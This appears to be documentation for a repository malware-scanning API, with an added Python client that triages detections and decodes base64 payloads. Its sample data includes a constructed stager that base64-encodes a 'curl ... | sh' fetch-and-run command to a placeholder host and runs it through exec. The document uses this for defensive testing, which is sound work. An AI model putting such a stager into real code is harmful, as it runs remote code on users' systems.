GitHub Repo Scanner

This endpoint scans a specified GitHub repository for potentially malicious code. It flags risky executions, known encoded or encrypted payloads, obfuscated scripts and common malware patterns.

The API provides detailed detections with file names, line numbers, and decoded content (if applicable).


Endpoint

GET https://api.elliott.diy/v1/malware/github?repo=<GitHub_Repo_Owner>/<Repo_Name>

Request Parameters

Parameter | Type   | Required | Description
----------|--------|----------|------------
repo      | string | ✅ Yes   | The GitHub repository to scan, formatted as <owner>/<repo>.


Example Request

curl "https://api.elliott.diy/v1/malware/github?repo=grobarqxd6996/Discord-Boost-Tool"

Response Format

  • Content-Type: application/json

  • Status Codes:

    • 200 OK: Successfully analyzed the repository.

    • 400 Bad Request: Invalid or missing repository name.

    • 500 Internal Server Error: An error occurred during analysis.

Example Response (Defanged)

{
  "detections": [
    {
      "file": "muck-stealer.py",
      "line": 22,
      "content": "import subprocess; subprocess.run(['pip', 'install', 'cryptography'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); ...",
      "decoded": null
    }
  ],
  "urls": null,
  "suspicious": true
}

Response Fields

Field                  | Type           | Description
-----------------------|----------------|------------
detections             | Array          | List of detected suspicious code patterns; each entry carries the four fields below.
detections[].file      | String         | Name of the file where the detection occurred.
detections[].line      | Integer        | Line number within that file where the suspicious content was found.
detections[].content   | String         | Snippet of the detected code.
detections[].decoded   | String or null | Decoded form of the snippet when the scanner could decode it (for example an encoded payload); null otherwise.
urls                   | Array or null  | URLs extracted from the repository, or null if none were found.
suspicious             | Boolean        | Indicates whether the repository contains potentially malicious code.


Usage Notes

  • The API flags suspicious patterns but does not guarantee accuracy; expect false positives and false negatives, so manual review of every detection is recommended.

  • A null decoded value does not by itself mean the snippet is harmless. It is null both for plaintext detections (as in the example above) and for encrypted or obfuscated code the scanner could not decode; the latter requires further analysis on your side.

  • If the payload is heavily obfuscated, the request may fail (500 Internal Server Error) because of internal database constraints.

  • Designed to help detect malware, info stealers, and automated threats in repositories.
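The following is an added end-to-end example, not the API's own client code, that puts the endpoint description, the status codes, the response fields and the usage notes above into working code: it validates the <owner>/<repo> name before sending (so a malformed name never reaches the 400 path), maps 400 and 500 to exceptions, and triages a response by ordering detections, attempting a local base64 decode wherever decoded is null, and pulling URLs out of whatever text results. The repo-name regex, the base64 and URL heuristics, the second sample detection and the example.invalid URL are assumptions made here; the first sample detection is the page's own example response.

```python
"""Client and local triage helper for the GitHub Repo Scanner endpoint (added example)."""
from __future__ import annotations

import base64
import json
import re
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "https://api.elliott.diy/v1/malware/github"

# Assumed shape of a GitHub <owner>/<repo> name; the page only says "<owner>/<repo>".
REPO_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]{0,38}/[A-Za-z0-9._-]{1,100}$")
# Assumed heuristics: long base64-looking runs and plain http(s) URLs inside snippets.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def is_valid_repo(repo: str) -> bool:
    return bool(REPO_RE.match(repo))


def build_url(repo: str) -> str:
    """Validate locally (saves a round trip that would end in 400) and build the scan URL."""
    if not is_valid_repo(repo):
        raise ValueError(f"repo must be <owner>/<repo>, got {repo!r}")
    return f"{ENDPOINT}?repo={urllib.parse.quote(repo, safe='/')}"


def scan_repo(repo: str, timeout: float = 120.0) -> dict:
    """GET the endpoint and return the parsed JSON; 400/500 become the documented errors."""
    req = urllib.request.Request(build_url(repo), headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 400:
            raise ValueError("400: invalid or missing repository name") from err
        if err.code == 500:
            raise RuntimeError("500: analysis failed (heavily obfuscated payloads can cause this)") from err
        raise


def try_decode_base64(snippet: str) -> list[str]:
    """Follow-up for detections whose 'decoded' is null: decode long base64 runs and
    keep the ones that come out as mostly printable text."""
    found = []
    for match in B64_RE.finditer(snippet):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error (bad characters or padding) is a ValueError
            continue
        text = raw.decode("utf-8", errors="replace")
        printable = sum(c.isprintable() or c in "\n\t" for c in text) / max(len(text), 1)
        if printable > 0.9:
            found.append(text)
    return found


def triage(report: dict) -> dict:
    """One review entry per detection, ordered by file and line, with decoded text
    (server-side if present, else local) and every URL seen in any of that text."""
    urls = set(report.get("urls") or [])
    findings = []
    for det in sorted(report.get("detections") or [], key=lambda d: (d["file"], d["line"])):
        content = det.get("content") or ""
        decoded = det.get("decoded")
        local = try_decode_base64(content) if decoded is None else []
        for text in (content, decoded or "", *local):
            urls.update(URL_RE.findall(text))
        findings.append({
            "file": det["file"],
            "line": det["line"],
            "decoded": decoded if decoded is not None else (local[0] if local else None),
            # Undecoded after both attempts: the "requires further analysis" case.
            "needs_manual_review": decoded is None and not local,
        })
    return {"suspicious": bool(report.get("suspicious")), "findings": findings, "urls": sorted(urls)}


# Constructed sample response: the first detection is the page's own example, the
# second is a made-up base64 stager that the server left undecoded.
SAMPLE_PAYLOAD = 'import os; os.system("curl http://example.invalid/p.sh | sh")'
SAMPLE_REPORT = {
    "detections": [
        {"file": "muck-stealer.py", "line": 22, "decoded": None,
         "content": "import subprocess; subprocess.run(['pip', 'install', 'cryptography'], "
                    "stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); ..."},
        {"file": "loader.py", "line": 7, "decoded": None,
         "content": "exec(__import__('base64').b64decode('"
                    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "'))"},
    ],
    "urls": None,
    "suspicious": True,
}

if __name__ == "__main__":
    # A live run would be: triage(scan_repo("grobarqxd6996/Discord-Boost-Tool"))
    print(json.dumps(triage(SAMPLE_REPORT), indent=2))
```

The local base64 step is deliberately conservative (40+ characters, strict decoding, mostly printable output) so it surfaces stagers without turning every long identifier into a "decoded payload"; anything still undecoded is marked needs_manual_review, which is the case the usage notes tell you to analyse by hand.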
